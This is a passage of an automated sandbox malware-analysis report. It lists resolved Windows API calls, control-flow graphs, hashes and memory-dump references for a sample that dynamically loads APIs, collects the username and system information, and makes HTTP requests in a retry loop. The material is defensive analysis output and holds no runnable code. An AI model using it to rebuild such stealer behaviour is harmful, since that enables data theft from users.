                                          • Instruction ID: f0773870aa1541f0f452216edb748a72dd0e89211326913ad982376b9aaceb80
                                          • Opcode Fuzzy Hash: d65c674f79adec8a3eb0ad96438dc7edf27b6f80b7edac237a56a7b9364829cf
                                          • Instruction Fuzzy Hash: DA0186B1A08204EFC710DF94DD46BABFBB8F749B21F10425AF985F7280C37569008BA1
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E911B7), ref: 00EA7880
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA7887
                                          • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00EA789F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$AllocateNameProcessUser
                                          • String ID:
                                          • API String ID: 1296208442-0
                                          • Opcode ID: 9f5bd94169db22e2e04ea040602c6846214203d8b6130fb209e8048ae870fddd
                                          • Instruction ID: 86a29a09595ac7911e40f551562e0298b514af44f89bc7e7db6a0a8a780e9332
                                          • Opcode Fuzzy Hash: 9f5bd94169db22e2e04ea040602c6846214203d8b6130fb209e8048ae870fddd
                                          • Instruction Fuzzy Hash: 2EF044B1E44208EBC714DF94DD46BAEBBB8F709711F100159FA45A3680C77915048BA1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitInfoProcessSystem
                                          • String ID:
                                          • API String ID: 752954902-0
                                          • Opcode ID: 25aeda6ed038e8dbca35aa517c9bef7823cac9e96a5ccc534d45f2976a1218d6
                                          • Instruction ID: 221206a858cbde7506360e9a1e6edd4f68e64714b72dcd616f6ea9289d621d05
                                          • Opcode Fuzzy Hash: 25aeda6ed038e8dbca35aa517c9bef7823cac9e96a5ccc534d45f2976a1218d6
                                          • Instruction Fuzzy Hash: 27D05E74A0130CDBCB10DFE0D8496DDBB78FB08312F001594DD0673340EA315481CBA5

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 633 ea9c10-ea9c1a 634 ea9c20-eaa031 GetProcAddress * 43 633->634 635 eaa036-eaa0ca LoadLibraryA * 8 633->635 634->635 636 eaa0cc-eaa141 GetProcAddress * 5 635->636 637 eaa146-eaa14d 635->637 636->637 638 eaa153-eaa211 GetProcAddress * 8 637->638 639 eaa216-eaa21d 637->639 638->639 640 eaa298-eaa29f 639->640 641 eaa21f-eaa293 GetProcAddress * 5 639->641 642 eaa337-eaa33e 640->642 643 eaa2a5-eaa332 GetProcAddress * 6 640->643 641->640 644 eaa41f-eaa426 642->644 645 eaa344-eaa41a GetProcAddress * 9 642->645 643->642 646 eaa428-eaa49d GetProcAddress * 5 644->646 647 eaa4a2-eaa4a9 644->647 645->644 646->647 648 eaa4ab-eaa4d7 GetProcAddress * 2 647->648 649 eaa4dc-eaa4e3 647->649 648->649 650 eaa515-eaa51c 649->650 651 eaa4e5-eaa510 GetProcAddress * 2 649->651 652 eaa612-eaa619 650->652 653 eaa522-eaa60d GetProcAddress * 10 650->653 651->650 654 eaa61b-eaa678 GetProcAddress * 4 652->654 655 eaa67d-eaa684 652->655 653->652 654->655 656 eaa69e-eaa6a5 655->656 657 eaa686-eaa699 GetProcAddress 655->657 658 eaa708-eaa709 656->658 659 eaa6a7-eaa703 GetProcAddress * 4 656->659 657->656 659->658
                                          APIs
                                          • GetProcAddress.KERNEL32(76210000,00BA5328), ref: 00EA9C2D
                                          • GetProcAddress.KERNEL32(76210000,00BA52A8), ref: 00EA9C45
                                          • GetProcAddress.KERNEL32(76210000,00BB8FF8), ref: 00EA9C5E
                                          • GetProcAddress.KERNEL32(76210000,00BB8FC8), ref: 00EA9C76
                                          • GetProcAddress.KERNEL32(76210000,00BB9010), ref: 00EA9C8E
                                          • GetProcAddress.KERNEL32(76210000,00BBD820), ref: 00EA9CA7
                                          • GetProcAddress.KERNEL32(76210000,00BAA860), ref: 00EA9CBF
                                          • GetProcAddress.KERNEL32(76210000,00BBD8E0), ref: 00EA9CD7
                                          • GetProcAddress.KERNEL32(76210000,00BBD9B8), ref: 00EA9CF0
                                          • GetProcAddress.KERNEL32(76210000,00BBD928), ref: 00EA9D08
                                          • GetProcAddress.KERNEL32(76210000,00BBD7D8), ref: 00EA9D20
                                          • GetProcAddress.KERNEL32(76210000,00BA4FA8), ref: 00EA9D39
                                          • GetProcAddress.KERNEL32(76210000,00BA5048), ref: 00EA9D51
                                          • GetProcAddress.KERNEL32(76210000,00BA5168), ref: 00EA9D69
                                          • GetProcAddress.KERNEL32(76210000,00BA50A8), ref: 00EA9D82
                                          • GetProcAddress.KERNEL32(76210000,00BBDA60), ref: 00EA9D9A
                                          • GetProcAddress.KERNEL32(76210000,00BBD970), ref: 00EA9DB2
                                          • GetProcAddress.KERNEL32(76210000,00BAA450), ref: 00EA9DCB
                                          • GetProcAddress.KERNEL32(76210000,00BA51A8), ref: 00EA9DE3
                                          • GetProcAddress.KERNEL32(76210000,00BBD9A0), ref: 00EA9DFB
                                          • GetProcAddress.KERNEL32(76210000,00BBD850), ref: 00EA9E14
                                          • GetProcAddress.KERNEL32(76210000,00BBD940), ref: 00EA9E2C
                                          • GetProcAddress.KERNEL32(76210000,00BBD9D0), ref: 00EA9E44
                                          • GetProcAddress.KERNEL32(76210000,00BA5228), ref: 00EA9E5D
                                          • GetProcAddress.KERNEL32(76210000,00BBD910), ref: 00EA9E75
                                          • GetProcAddress.KERNEL32(76210000,00BBD958), ref: 00EA9E8D
                                          • GetProcAddress.KERNEL32(76210000,00BBD988), ref: 00EA9EA6
                                          • GetProcAddress.KERNEL32(76210000,00BBDA48), ref: 00EA9EBE
                                          • GetProcAddress.KERNEL32(76210000,00BBD9E8), ref: 00EA9ED6
                                          • GetProcAddress.KERNEL32(76210000,00BBDA00), ref: 00EA9EEF
                                          • GetProcAddress.KERNEL32(76210000,00BBD8F8), ref: 00EA9F07
                                          • GetProcAddress.KERNEL32(76210000,00BBD8C8), ref: 00EA9F1F
                                          • GetProcAddress.KERNEL32(76210000,00BBDA78), ref: 00EA9F38
                                          • GetProcAddress.KERNEL32(76210000,00BAFDA8), ref: 00EA9F50
                                          • GetProcAddress.KERNEL32(76210000,00BBD838), ref: 00EA9F68
                                          • GetProcAddress.KERNEL32(76210000,00BBDA18), ref: 00EA9F81
                                          • GetProcAddress.KERNEL32(76210000,00BA50E8), ref: 00EA9F99
                                          • GetProcAddress.KERNEL32(76210000,00BBDA30), ref: 00EA9FB1
                                          • GetProcAddress.KERNEL32(76210000,00BA4F48), ref: 00EA9FCA
                                          • GetProcAddress.KERNEL32(76210000,00BBD7C0), ref: 00EA9FE2
                                          • GetProcAddress.KERNEL32(76210000,00BBDA90), ref: 00EA9FFA
                                          • GetProcAddress.KERNEL32(76210000,00BA4FC8), ref: 00EAA013
                                          • GetProcAddress.KERNEL32(76210000,00BA51E8), ref: 00EAA02B
                                          • LoadLibraryA.KERNEL32(00BBD868,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA03D
                                          • LoadLibraryA.KERNEL32(00BBDAA8,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA04E
                                          • LoadLibraryA.KERNEL32(00BBD880,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA060
                                          • LoadLibraryA.KERNEL32(00BBD7F0,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA072
                                          • LoadLibraryA.KERNEL32(00BBD808,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA083
                                          • LoadLibraryA.KERNEL32(00BBD898,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA095
                                          • LoadLibraryA.KERNEL32(00BBD8B0,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA0A7
                                          • LoadLibraryA.KERNEL32(00BBDCA0,?,00EA5CA3,00EB0AEB,?,?,?,?,?,?,?,?,?,?,00EB0AEA,00EB0AE3), ref: 00EAA0B8
                                          • GetProcAddress.KERNEL32(751E0000,00BA50C8), ref: 00EAA0DA
                                          • GetProcAddress.KERNEL32(751E0000,00BBDCB8), ref: 00EAA0F2
                                          • GetProcAddress.KERNEL32(751E0000,00BB8C48), ref: 00EAA10A
                                          • GetProcAddress.KERNEL32(751E0000,00BBDB38), ref: 00EAA123
                                          • GetProcAddress.KERNEL32(751E0000,00BA5248), ref: 00EAA13B
                                          • GetProcAddress.KERNEL32(700F0000,00BAA5E0), ref: 00EAA160
                                          • GetProcAddress.KERNEL32(700F0000,00BA5348), ref: 00EAA179
                                          • GetProcAddress.KERNEL32(700F0000,00BAA608), ref: 00EAA191
                                          • GetProcAddress.KERNEL32(700F0000,00BBDC58), ref: 00EAA1A9
                                          • GetProcAddress.KERNEL32(700F0000,00BBDC70), ref: 00EAA1C2
                                          • GetProcAddress.KERNEL32(700F0000,00BA5528), ref: 00EAA1DA
                                          • GetProcAddress.KERNEL32(700F0000,00BA5388), ref: 00EAA1F2
                                          • GetProcAddress.KERNEL32(700F0000,00BBDCE8), ref: 00EAA20B
                                          • GetProcAddress.KERNEL32(753A0000,00BA5668), ref: 00EAA22C
                                          • GetProcAddress.KERNEL32(753A0000,00BA5548), ref: 00EAA244
                                          • GetProcAddress.KERNEL32(753A0000,00BBDB68), ref: 00EAA25D
                                          • GetProcAddress.KERNEL32(753A0000,00BBDB20), ref: 00EAA275
                                          • GetProcAddress.KERNEL32(753A0000,00BA54C8), ref: 00EAA28D
                                          • GetProcAddress.KERNEL32(76310000,00BAA8D8), ref: 00EAA2B3
                                          • GetProcAddress.KERNEL32(76310000,00BAA748), ref: 00EAA2CB
                                          • GetProcAddress.KERNEL32(76310000,00BBDDA8), ref: 00EAA2E3
                                          • GetProcAddress.KERNEL32(76310000,00BA56A8), ref: 00EAA2FC
                                          • GetProcAddress.KERNEL32(76310000,00BA5688), ref: 00EAA314
                                          • GetProcAddress.KERNEL32(76310000,00BAA680), ref: 00EAA32C
                                          • GetProcAddress.KERNEL32(76910000,00BBDD78), ref: 00EAA352
                                          • GetProcAddress.KERNEL32(76910000,00BA5448), ref: 00EAA36A
                                          • GetProcAddress.KERNEL32(76910000,00BB8BD8), ref: 00EAA382
                                          • GetProcAddress.KERNEL32(76910000,00BBDAD8), ref: 00EAA39B
                                          • GetProcAddress.KERNEL32(76910000,00BBDC88), ref: 00EAA3B3
                                          • GetProcAddress.KERNEL32(76910000,00BA56C8), ref: 00EAA3CB
                                          • GetProcAddress.KERNEL32(76910000,00BA54A8), ref: 00EAA3E4
                                          • GetProcAddress.KERNEL32(76910000,00BBDAF0), ref: 00EAA3FC
                                          • GetProcAddress.KERNEL32(76910000,00BBDB08), ref: 00EAA414
                                          • GetProcAddress.KERNEL32(75B30000,00BA5628), ref: 00EAA436
                                          • GetProcAddress.KERNEL32(75B30000,00BBDBC8), ref: 00EAA44E
                                          • GetProcAddress.KERNEL32(75B30000,00BBDB80), ref: 00EAA466
                                          • GetProcAddress.KERNEL32(75B30000,00BBDAC0), ref: 00EAA47F
                                          • GetProcAddress.KERNEL32(75B30000,00BBDB50), ref: 00EAA497
                                          • GetProcAddress.KERNEL32(75670000,00BA5468), ref: 00EAA4B8
                                          • GetProcAddress.KERNEL32(75670000,00BA56E8), ref: 00EAA4D1
                                          • GetProcAddress.KERNEL32(76AC0000,00BA5408), ref: 00EAA4F2
                                          • GetProcAddress.KERNEL32(76AC0000,00BBDD90), ref: 00EAA50A
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA54E8), ref: 00EAA530
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA5368), ref: 00EAA548
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA53A8), ref: 00EAA560
                                          • GetProcAddress.KERNEL32(6F4E0000,00BBDB98), ref: 00EAA579
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA53C8), ref: 00EAA591
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA53E8), ref: 00EAA5A9
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA5428), ref: 00EAA5C2
                                          • GetProcAddress.KERNEL32(6F4E0000,00BA5648), ref: 00EAA5DA
                                          • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 00EAA5F1
                                          • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 00EAA607
                                          • GetProcAddress.KERNEL32(75AE0000,00BBDBE0), ref: 00EAA629
                                          • GetProcAddress.KERNEL32(75AE0000,00BB8AC8), ref: 00EAA641
                                          • GetProcAddress.KERNEL32(75AE0000,00BBDBB0), ref: 00EAA659
                                          • GetProcAddress.KERNEL32(75AE0000,00BBDC28), ref: 00EAA672
                                          • GetProcAddress.KERNEL32(76300000,00BA5488), ref: 00EAA693
                                          • GetProcAddress.KERNEL32(6FE40000,00BBDBF8), ref: 00EAA6B4
                                          • GetProcAddress.KERNEL32(6FE40000,00BA5568), ref: 00EAA6CD
                                          • GetProcAddress.KERNEL32(6FE40000,00BBDCD0), ref: 00EAA6E5
                                          • GetProcAddress.KERNEL32(6FE40000,00BBDD00), ref: 00EAA6FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: HttpQueryInfoA$InternetSetOptionA
                                          • API String ID: 2238633743-1775429166
                                          • Opcode ID: e5cc3428da31f3beb7b543f9ec5b5399ab09005dc6aabba309ed9de79c2aa0ac
                                          • Instruction ID: 1fdfcc2bd6c7ab058a4be5126a5b8bb3d3288981c5935ce40cca0e2ece980dc1
                                          • Opcode Fuzzy Hash: e5cc3428da31f3beb7b543f9ec5b5399ab09005dc6aabba309ed9de79c2aa0ac
                                          • Instruction Fuzzy Hash: 8B622BB5702241EFC764DFA8E98996637F9F78C201315855ABE8AC324CDB3F9541DB20

                                          Control-flow Graph

                                          control_flow_graph 1033 e96280-e9630b call eaa7a0 call e947b0 call eaa740 InternetOpenA StrCmpCA 1040 e9630d 1033->1040 1041 e96314-e96318 1033->1041 1040->1041 1042 e96509-e96525 call eaa7a0 call eaa800 * 2 1041->1042 1043 e9631e-e96342 InternetConnectA 1041->1043 1062 e96528-e9652d 1042->1062 1045 e96348-e9634c 1043->1045 1046 e964ff-e96503 InternetCloseHandle 1043->1046 1048 e9635a 1045->1048 1049 e9634e-e96358 1045->1049 1046->1042 1050 e96364-e96392 HttpOpenRequestA 1048->1050 1049->1050 1052 e96398-e9639c 1050->1052 1053 e964f5-e964f9 InternetCloseHandle 1050->1053 1055 e9639e-e963bf InternetSetOptionA 1052->1055 1056 e963c5-e96405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 e9642c-e9644b call ea8940 1056->1058 1059 e96407-e96427 call eaa740 call eaa800 * 2 1056->1059 1067 e964c9-e964e9 call eaa740 call eaa800 * 2 1058->1067 1068 e9644d-e96454 1058->1068 1059->1062 1067->1062 1069 e964c7-e964ef InternetCloseHandle 1068->1069 1070 e96456-e96480 InternetReadFile 1068->1070 1069->1053 1073 e9648b 1070->1073 1074 e96482-e96489 1070->1074 1073->1069 1074->1073 1078 e9648d-e964c5 call eaa9b0 call eaa8a0 call eaa800 1074->1078 1078->1070
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                            • Part of subcall function 00E947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • InternetOpenA.WININET(00EB0DFE,00000001,00000000,00000000,00000000), ref: 00E962E1
                                          • StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E96303
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E96335
                                          • HttpOpenRequestA.WININET(00000000,GET,?,00BBF278,00000000,00000000,00400100,00000000), ref: 00E96385
                                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E963BF
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E963D1
                                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00E963FD
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E9646D
                                          • InternetCloseHandle.WININET(00000000), ref: 00E964EF
                                          • InternetCloseHandle.WININET(00000000), ref: 00E964F9
                                          • InternetCloseHandle.WININET(00000000), ref: 00E96503
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                          • String ID: ERROR$ERROR$GET
                                          • API String ID: 3749127164-2509457195
                                          • Opcode ID: 5b8ad47edbaa1bb09ec94ed43d464cbb54b754340800319e4d1bf97b434d16f6
                                          • Instruction ID: bf2fa369a91cef15860e924f3903c2e6533233c6a648635de72809cbc76b3168
                                          • Opcode Fuzzy Hash: 5b8ad47edbaa1bb09ec94ed43d464cbb54b754340800319e4d1bf97b434d16f6
                                          • Instruction Fuzzy Hash: 12713B71A00318EBDF24DBA0DC49BEE77B4BB48700F1091A9F50A7B184DBB96A85CF51

                                          Control-flow Graph

                                          control_flow_graph 1090 ea5510-ea5577 call ea5ad0 call eaa820 * 3 call eaa740 * 4 1106 ea557c-ea5583 1090->1106 1107 ea55d7-ea564c call eaa740 * 2 call e91590 call ea52c0 call eaa8a0 call eaa800 call eaaad0 StrCmpCA 1106->1107 1108 ea5585-ea55b6 call eaa820 call eaa7a0 call e91590 call ea51f0 1106->1108 1134 ea5693-ea56a9 call eaaad0 StrCmpCA 1107->1134 1138 ea564e-ea568e call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1107->1138 1124 ea55bb-ea55d2 call eaa8a0 call eaa800 1108->1124 1124->1134 1139 ea56af-ea56b6 1134->1139 1140 ea57dc-ea5844 call eaa8a0 call eaa820 * 2 call e91670 call eaa800 * 4 call ea6560 call e91550 1134->1140 1138->1134 1143 ea57da-ea585f call eaaad0 StrCmpCA 1139->1143 1144 ea56bc-ea56c3 1139->1144 1270 ea5ac3-ea5ac6 1140->1270 1163 ea5991-ea59f9 call eaa8a0 call eaa820 * 2 call e91670 call eaa800 * 4 call ea6560 call e91550 1143->1163 1164 ea5865-ea586c 1143->1164 1148 ea571e-ea5793 call eaa740 * 2 call e91590 call ea52c0 call eaa8a0 call eaa800 call eaaad0 StrCmpCA 1144->1148 1149 ea56c5-ea5719 call eaa820 call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1144->1149 1148->1143 1249 ea5795-ea57d5 call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1148->1249 1149->1143 1163->1270 1170 ea598f-ea5a14 call eaaad0 StrCmpCA 1164->1170 1171 ea5872-ea5879 1164->1171 1199 ea5a28-ea5a91 call eaa8a0 call eaa820 * 2 call e91670 call eaa800 * 4 call ea6560 call e91550 1170->1199 1200 ea5a16-ea5a21 Sleep 1170->1200 1178 ea587b-ea58ce call eaa820 call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1171->1178 1179 ea58d3-ea5948 call eaa740 * 2 call e91590 call ea52c0 call eaa8a0 call eaa800 call eaaad0 StrCmpCA 1171->1179 1178->1170 1179->1170 1275 ea594a-ea598a call eaa7a0 call e91590 call ea51f0 call eaa8a0 call eaa800 1179->1275 1199->1270 1200->1106 1249->1143 1275->1170
                                          APIs
                                            • Part of subcall function 00EAA820: lstrlen.KERNEL32(00E94F05,?,?,00E94F05,00EB0DDE), ref: 00EAA82B
                                            • Part of subcall function 00EAA820: lstrcpy.KERNEL32(00EB0DDE,00000000), ref: 00EAA885
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA5644
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA56A1
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA5857
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00EA51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA5228
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EA52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA5318
                                            • Part of subcall function 00EA52C0: lstrlen.KERNEL32(00000000), ref: 00EA532F
                                            • Part of subcall function 00EA52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00EA5364
                                            • Part of subcall function 00EA52C0: lstrlen.KERNEL32(00000000), ref: 00EA5383
                                            • Part of subcall function 00EA52C0: lstrlen.KERNEL32(00000000), ref: 00EA53AE
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA578B
                                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00EA5940
                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00EA5A0C
                                          • Sleep.KERNEL32(0000EA60), ref: 00EA5A1B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                          • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
